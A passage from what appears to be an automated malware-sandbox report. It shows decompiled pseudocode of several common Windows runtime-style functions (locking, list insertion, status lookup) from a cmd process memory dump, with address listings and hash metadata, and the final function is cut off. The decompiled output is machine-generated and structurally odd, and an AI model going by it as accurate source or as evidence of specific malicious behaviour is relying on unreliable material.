                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 96%
                                                                                                                                          			E03BEEF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E03BD9080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x7746c21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E03BD2D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}




























                                                                                                                                          0x03beef4b
                                                                                                                                          0x03beef4d
                                                                                                                                          0x03beef57
                                                                                                                                          0x03bef0bd
                                                                                                                                          0x03bef0c2
                                                                                                                                          0x03bef0d2
                                                                                                                                          0x03bef0d2
                                                                                                                                          0x03bef0c2
                                                                                                                                          0x03beef5d
                                                                                                                                          0x03beef5f
                                                                                                                                          0x03beef67
                                                                                                                                          0x03beef6a
                                                                                                                                          0x03beef6d
                                                                                                                                          0x03beef74
                                                                                                                                          0x03beef7f
                                                                                                                                          0x03beef82
                                                                                                                                          0x03beef82
                                                                                                                                          0x03beef86
                                                                                                                                          0x03beef88
                                                                                                                                          0x03beef8c
                                                                                                                                          0x03beef8f
                                                                                                                                          0x03beef8f
                                                                                                                                          0x03beef8f
                                                                                                                                          0x00000000
                                                                                                                                          0x03beef91
                                                                                                                                          0x03beef93
                                                                                                                                          0x03beefc4
                                                                                                                                          0x03beefc4
                                                                                                                                          0x03beefc4
                                                                                                                                          0x03beefca
                                                                                                                                          0x03beefd0
                                                                                                                                          0x03bef0a6
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03bef0af
                                                                                                                                          0x03c3bb06
                                                                                                                                          0x03c3bb0a
                                                                                                                                          0x03bef0b5
                                                                                                                                          0x03bef0b5
                                                                                                                                          0x03bef0b5
                                                                                                                                          0x03bef0b5
                                                                                                                                          0x00000000
                                                                                                                                          0x03beefd6
                                                                                                                                          0x03beefd9
                                                                                                                                          0x03bef0de
                                                                                                                                          0x03bef0e2
                                                                                                                                          0x03beefdf
                                                                                                                                          0x03beefdf
                                                                                                                                          0x03beefdf
                                                                                                                                          0x03beefe5
                                                                                                                                          0x03c3bafc
                                                                                                                                          0x03c3bafc
                                                                                                                                          0x03beefe5
                                                                                                                                          0x03beefeb
                                                                                                                                          0x03beefed
                                                                                                                                          0x03bef00f
                                                                                                                                          0x03bef011
                                                                                                                                          0x03bef01a
                                                                                                                                          0x03bef01d
                                                                                                                                          0x03bef021
                                                                                                                                          0x03bef028
                                                                                                                                          0x03bef029
                                                                                                                                          0x03bef029
                                                                                                                                          0x03bef02c
                                                                                                                                          0x00000000
                                                                                                                                          0x03bef02c
                                                                                                                                          0x03beeff3
                                                                                                                                          0x03beeff9
                                                                                                                                          0x03bef0ea
                                                                                                                                          0x03bef0ed
                                                                                                                                          0x03bef0ef
                                                                                                                                          0x00000000
                                                                                                                                          0x03bef0ef
                                                                                                                                          0x03bef003
                                                                                                                                          0x03c3bb12
                                                                                                                                          0x03bef045
                                                                                                                                          0x03bef049
                                                                                                                                          0x03bef051
                                                                                                                                          0x03bef09e
                                                                                                                                          0x03bef0a0
                                                                                                                                          0x03bef0a0
                                                                                                                                          0x03bef09e
                                                                                                                                          0x03bef053
                                                                                                                                          0x03bef064
                                                                                                                                          0x03bef064
                                                                                                                                          0x03bef06b
                                                                                                                                          0x03c3bb1a
                                                                                                                                          0x03c3bb1a
                                                                                                                                          0x03bef071
                                                                                                                                          0x03bef071
                                                                                                                                          0x03bef07d
                                                                                                                                          0x03bef082
                                                                                                                                          0x03bef08f
                                                                                                                                          0x03bef08f
                                                                                                                                          0x03bef009
                                                                                                                                          0x03bef00d
                                                                                                                                          0x00000000
                                                                                                                                          0x03bef00d
                                                                                                                                          0x03beefd0
                                                                                                                                          0x03beef97
                                                                                                                                          0x03beefa5
                                                                                                                                          0x03beefaa
                                                                                                                                          0x00000000
                                                                                                                                          0x03beefac
                                                                                                                                          0x03beefac
                                                                                                                                          0x03beefac
                                                                                                                                          0x00000000
                                                                                                                                          0x03beefb2
                                                                                                                                          0x03bef036
                                                                                                                                          0x03bef03a
                                                                                                                                          0x03bef040
                                                                                                                                          0x03bef090
                                                                                                                                          0x00000000
                                                                                                                                          0x03bef092
                                                                                                                                          0x03bef042
                                                                                                                                          0x00000000
                                                                                                                                          0x03bef042
                                                                                                                                          0x03beefb7
                                                                                                                                          0x03beefb9
                                                                                                                                          0x03beefbc
                                                                                                                                          0x03beefb0
                                                                                                                                          0x03beefb0
                                                                                                                                          0x00000000
                                                                                                                                          0x03beefbe
                                                                                                                                          0x03beefbe
                                                                                                                                          0x03beefc1
                                                                                                                                          0x00000000
                                                                                                                                          0x03beefc1
                                                                                                                                          0x03beefbc
                                                                                                                                          0x03beefaa
                                                                                                                                          0x03beef91

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                                                                                                          • Instruction ID: 2d4d8509a7adcb8517f773e7e176ece2b3400f0e7c7ee4df53c2b852e0391a3b
                                                                                                                                          • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                                                                                                          • Instruction Fuzzy Hash: 3D51DD30A04249AFEB24CF6CC0907AEFBB1EF45318F1982F9D44597282D776A989C791
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03CA740D Relevance: .1, Instructions: 141COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 84%
                                                                                                                                          			E03CA740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E03C2D4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E03C1F380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L03BF4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L03BF4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E03C1F3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L03BF4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}





















                                                                                                                                          0x03ca740d
                                                                                                                                          0x03ca740d
                                                                                                                                          0x03ca7412
                                                                                                                                          0x03ca7413
                                                                                                                                          0x03ca7416
                                                                                                                                          0x03ca7418
                                                                                                                                          0x03ca741c
                                                                                                                                          0x03ca741f
                                                                                                                                          0x03ca7422
                                                                                                                                          0x03ca7422
                                                                                                                                          0x03ca7428
                                                                                                                                          0x03ca742a
                                                                                                                                          0x03ca742a
                                                                                                                                          0x03ca7451
                                                                                                                                          0x03ca7432
                                                                                                                                          0x03ca744f
                                                                                                                                          0x03ca744f
                                                                                                                                          0x00000000
                                                                                                                                          0x03ca7434
                                                                                                                                          0x03ca7438
                                                                                                                                          0x03ca7443
                                                                                                                                          0x03ca7517
                                                                                                                                          0x03ca7517
                                                                                                                                          0x03ca751a
                                                                                                                                          0x03ca7535
                                                                                                                                          0x03ca7520
                                                                                                                                          0x03ca7527
                                                                                                                                          0x03ca752c
                                                                                                                                          0x03ca7531
                                                                                                                                          0x03ca7533
                                                                                                                                          0x00000000
                                                                                                                                          0x03ca7533
                                                                                                                                          0x00000000
                                                                                                                                          0x03ca7531
                                                                                                                                          0x03ca754b
                                                                                                                                          0x03ca754f
                                                                                                                                          0x03ca755c
                                                                                                                                          0x03ca755c
                                                                                                                                          0x03ca755f
                                                                                                                                          0x03ca7560
                                                                                                                                          0x03ca7561
                                                                                                                                          0x03ca7562
                                                                                                                                          0x03ca7563
                                                                                                                                          0x03ca7568
                                                                                                                                          0x03ca756a
                                                                                                                                          0x03ca756c
                                                                                                                                          0x03ca756d
                                                                                                                                          0x03ca756d
                                                                                                                                          0x03ca756f
                                                                                                                                          0x03ca7572
                                                                                                                                          0x03ca7574
                                                                                                                                          0x03ca7577
                                                                                                                                          0x03ca757c
                                                                                                                                          0x03ca757f
                                                                                                                                          0x00000000
                                                                                                                                          0x03ca7551
                                                                                                                                          0x03ca7551
                                                                                                                                          0x03ca7551
                                                                                                                                          0x03ca7553
                                                                                                                                          0x03ca7553
                                                                                                                                          0x03ca7449
                                                                                                                                          0x03ca7449
                                                                                                                                          0x03ca744c
                                                                                                                                          0x03ca744c
                                                                                                                                          0x00000000
                                                                                                                                          0x03ca744c
                                                                                                                                          0x03ca7443
                                                                                                                                          0x03ca750e
                                                                                                                                          0x03ca7514
                                                                                                                                          0x03ca7514
                                                                                                                                          0x03ca7455
                                                                                                                                          0x03ca7469
                                                                                                                                          0x03ca746d
                                                                                                                                          0x00000000
                                                                                                                                          0x03ca7473
                                                                                                                                          0x03ca7473
                                                                                                                                          0x03ca7476
                                                                                                                                          0x03ca7480
                                                                                                                                          0x03ca7484
                                                                                                                                          0x03ca748e
                                                                                                                                          0x03ca7493
                                                                                                                                          0x03ca7493
                                                                                                                                          0x03ca7496
                                                                                                                                          0x03ca7499
                                                                                                                                          0x03ca74a1
                                                                                                                                          0x03ca74b1
                                                                                                                                          0x03ca74b5
                                                                                                                                          0x00000000
                                                                                                                                          0x03ca74bb
                                                                                                                                          0x03ca74c1
                                                                                                                                          0x03ca74c1
                                                                                                                                          0x03ca74c4
                                                                                                                                          0x03ca74c5
                                                                                                                                          0x03ca74c6
                                                                                                                                          0x03ca74c7
                                                                                                                                          0x03ca74c8
                                                                                                                                          0x03ca74cd
                                                                                                                                          0x00000000
                                                                                                                                          0x03ca74d3
                                                                                                                                          0x03ca74d3
                                                                                                                                          0x03ca74d6
                                                                                                                                          0x03ca74d8
                                                                                                                                          0x03ca74db
                                                                                                                                          0x03ca74dd
                                                                                                                                          0x03ca74e0
                                                                                                                                          0x03ca74e7
                                                                                                                                          0x03ca74ee
                                                                                                                                          0x03ca74ee
                                                                                                                                          0x03ca74f4
                                                                                                                                          0x03ca74f9
                                                                                                                                          0x00000000
                                                                                                                                          0x03ca74fb
                                                                                                                                          0x03ca74fb
                                                                                                                                          0x03ca74fd
                                                                                                                                          0x03ca7500
                                                                                                                                          0x03ca7503
                                                                                                                                          0x03ca7505
                                                                                                                                          0x03ca7505
                                                                                                                                          0x03ca74f9
                                                                                                                                          0x00000000
                                                                                                                                          0x03ca74cd
                                                                                                                                          0x03ca74b5
                                                                                                                                          0x00000000

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                                                                                                          • Instruction ID: b9b103eca95cea5d9322d90c8b8a67227f0ee076e699a6055c37430af8283867
                                                                                                                                          • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                                                                                                          • Instruction Fuzzy Hash: A5516D71600A06EFCB15DF99C480A96FBB5FF45308F1981BAE909DF211E371EA46CB90
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C02990 Relevance: .1, Instructions: 133COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 97%
                                                                                                                                          			E03C02990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x3caff00);
				E03C2D08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x3bb1664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E03C1E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x3bb1668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E03C551BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x3bb166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E03C02AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E03BE6600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E03C02C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E03BEEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E03C02AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E03C02C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E03C02ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E03C2D0D1(_t62);
				goto L28;
			}





















                                                                                                                                          0x03c02990
                                                                                                                                          0x03c02992
                                                                                                                                          0x03c02997
                                                                                                                                          0x03c029a3
                                                                                                                                          0x03c029a6
                                                                                                                                          0x03c029ab
                                                                                                                                          0x03c029ad
                                                                                                                                          0x03c029b2
                                                                                                                                          0x03c45c80
                                                                                                                                          0x03c029b8
                                                                                                                                          0x03c029b8
                                                                                                                                          0x03c029bb
                                                                                                                                          0x03c029c0
                                                                                                                                          0x03c029c5
                                                                                                                                          0x03c029c6
                                                                                                                                          0x03c029c6
                                                                                                                                          0x03c029cb
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c029cd
                                                                                                                                          0x03c029d0
                                                                                                                                          0x03c029d9
                                                                                                                                          0x03c029db
                                                                                                                                          0x03c029dd
                                                                                                                                          0x03c02a7f
                                                                                                                                          0x03c02a84
                                                                                                                                          0x03c02a87
                                                                                                                                          0x03c02a89
                                                                                                                                          0x03c45ca1
                                                                                                                                          0x03c45ca3
                                                                                                                                          0x00000000
                                                                                                                                          0x03c02a8f
                                                                                                                                          0x03c02a8f
                                                                                                                                          0x00000000
                                                                                                                                          0x03c02a8f
                                                                                                                                          0x00000000
                                                                                                                                          0x03c029e3
                                                                                                                                          0x03c029e3
                                                                                                                                          0x03c029e3
                                                                                                                                          0x00000000
                                                                                                                                          0x03c029e3
                                                                                                                                          0x03c029dd
                                                                                                                                          0x00000000
                                                                                                                                          0x03c029db
                                                                                                                                          0x03c029e6
                                                                                                                                          0x03c029e9
                                                                                                                                          0x03c029eb
                                                                                                                                          0x03c029ed
                                                                                                                                          0x03c029f3
                                                                                                                                          0x03c029f5
                                                                                                                                          0x03c029f8
                                                                                                                                          0x03c029fa
                                                                                                                                          0x03c02a97
                                                                                                                                          0x03c02a9a
                                                                                                                                          0x03c02a9d
                                                                                                                                          0x03c02add
                                                                                                                                          0x00000000
                                                                                                                                          0x03c02a9f
                                                                                                                                          0x03c02aa2
                                                                                                                                          0x03c02aa5
                                                                                                                                          0x03c02aa8
                                                                                                                                          0x03c02aab
                                                                                                                                          0x03c45cab
                                                                                                                                          0x03c45caf
                                                                                                                                          0x03c45cc5
                                                                                                                                          0x03c45cda
                                                                                                                                          0x03c45cdc
                                                                                                                                          0x03c45cdf
                                                                                                                                          0x03c45ce5
                                                                                                                                          0x00000000
                                                                                                                                          0x03c45ceb
                                                                                                                                          0x03c45ced
                                                                                                                                          0x03c45cee
                                                                                                                                          0x00000000
                                                                                                                                          0x03c45cee
                                                                                                                                          0x03c45cb1
                                                                                                                                          0x03c45cb4
                                                                                                                                          0x03c45cb9
                                                                                                                                          0x03c45cbb
                                                                                                                                          0x00000000
                                                                                                                                          0x03c45cbd
                                                                                                                                          0x03c45cbd
                                                                                                                                          0x00000000
                                                                                                                                          0x03c45cbd
                                                                                                                                          0x03c45cbb
                                                                                                                                          0x03c02ab1
                                                                                                                                          0x03c02ab1
                                                                                                                                          0x03c02ac4
                                                                                                                                          0x03c02ac6
                                                                                                                                          0x03c02ac6
                                                                                                                                          0x00000000
                                                                                                                                          0x03c02ac6
                                                                                                                                          0x03c02aab
                                                                                                                                          0x00000000
                                                                                                                                          0x03c02a00
                                                                                                                                          0x03c02a09
                                                                                                                                          0x03c02a0e
                                                                                                                                          0x03c02a21
                                                                                                                                          0x03c02a24
                                                                                                                                          0x03c02a35
                                                                                                                                          0x03c02a3a
                                                                                                                                          0x03c02a3d
                                                                                                                                          0x03c02a42
                                                                                                                                          0x03c02a59
                                                                                                                                          0x03c02a59
                                                                                                                                          0x03c02a5c
                                                                                                                                          0x03c02a5f
                                                                                                                                          0x03c02a5f
                                                                                                                                          0x03c029fa
                                                                                                                                          0x03c029f3
                                                                                                                                          0x03c02a64
                                                                                                                                          0x03c02a64
                                                                                                                                          0x03c02a6b
                                                                                                                                          0x03c02a6b
                                                                                                                                          0x03c02a6d
                                                                                                                                          0x03c02a72
                                                                                                                                          0x00000000

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 0d217396865cb0248980fd3e73f3d01a21a5b977d9b0110b90d649a74127d409
                                                                                                                                          • Instruction ID: 46e9b55a8448e04276c5a2b99d2862dc86dacf8317da225b48ae3d60fbfbbcd5
                                                                                                                                          • Opcode Fuzzy Hash: 0d217396865cb0248980fd3e73f3d01a21a5b977d9b0110b90d649a74127d409
                                                                                                                                          • Instruction Fuzzy Hash: B1518A31900259DFCF25CF59C888ADEBBB9BF0C310F158455E815EB2A0C7318A92DF90
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C04BAD Relevance: .1, Instructions: 131COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 85%
                                                                                                                                          			E03C04BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x3ccd360 ^ _t89;
